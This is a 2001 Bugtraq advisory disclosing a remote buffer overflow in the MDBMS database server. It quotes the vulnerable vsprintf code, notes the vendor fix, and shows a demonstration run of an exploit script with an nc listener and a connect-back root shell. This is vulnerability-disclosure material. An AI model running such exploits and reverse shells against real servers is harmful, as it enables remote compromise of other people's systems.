Bugtraq mailing list archives
Remote buffer overflow in MDBMS.
From: teleh0r - <teleh0r () digit-labs org>
Date: Tue, 12 Jun 2001 21:47:37 +0200
Dear bugtraq readers, MDBMS is a SQL database server (currently) for UNIX systems. Version 0.99b9 and below versions contain an exploitable buffer overflow in the handling of the \s console command. When a user passes large buffers to the server in the form of multiple lines, these are appended to the end of each other. A subsequent call to the \s command causes the overflow. Below is faulty code (from interface.cc): void user::uprintf(char *s, ...) { char b[10000]; int len=strlen(outbuf), newlen; va_list ap; va_start(ap,s); vsprintf(b,s,ap); <---- va_end(ap); newlen=strlen(b); while (newlen+len+10>=outsize) outbuf=(char*)realloc(outbuf,outsize+=1000); strcat(outbuf,b); FD_SET(fd,&parent->wmask); } mu-b also found a buffer overflow in the "create database" system. This was actually caused by a sprintf that generated the name of the management variable. This has been fixed - now table and database names can no longer be larger than 128 bytes. Information about the overflows was sent to marty () hinttech com. He has now fixed the problems, and new versions of MDBMS can be found at: http://www.hinttech.com/mdbms/ We would like to thank Marty for kind response and quick update. Exploit example: ---------------- [teleh0r@localhost mdbms]$ ./mdbms-pms.pl -- Remote code execution exploit - MDBMS <= 0.99b -- <teleh0r () digit-labs org> - Copyright (c) 2001 Usage: ./mdbms-pms.pl -t <hostname> -b <back> -t <hostname> : hostname to test -b <back> : connect back to ip -p <port> : port (default: 2223) -d <delay> : delay before timeout -o <offset> : offset -h : return to heap [teleh0r@localhost mdbms]$ nc -l -v -p 1337 & [1] 2070 listening on [any] 1337 ... [teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h -- Remote code execution exploit - MDBMS <= 0.99b -- <teleh0r () digit-labs org> - Copyright (c) 2001 -> Connected to: 127.1 / MDBMS V0.99b9 ready. -> Address : 0x302027d / xor-mask: 0x2020202 -> Return : 0x80cfe76 / using the heap ... -> Sending payload: ... -> * Successfully sent payload - good luck! connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189 [teleh0r@localhost mdbms]$ % nc -l -v -p 1337 whoami; uname -mnrsp root Linux localhost.localdomain 2.4.2-2 i686 unknown ... Exploit code attached. Sincerely yours, teleh0r and mu-b -- To avoid criticism, do nothing, say nothing, be nothing. -- Elbert Hubbard
Attachment:
mdbms.tar.gz
Description:
Current thread:
- Remote buffer overflow in MDBMS. teleh0r - (Jun 13)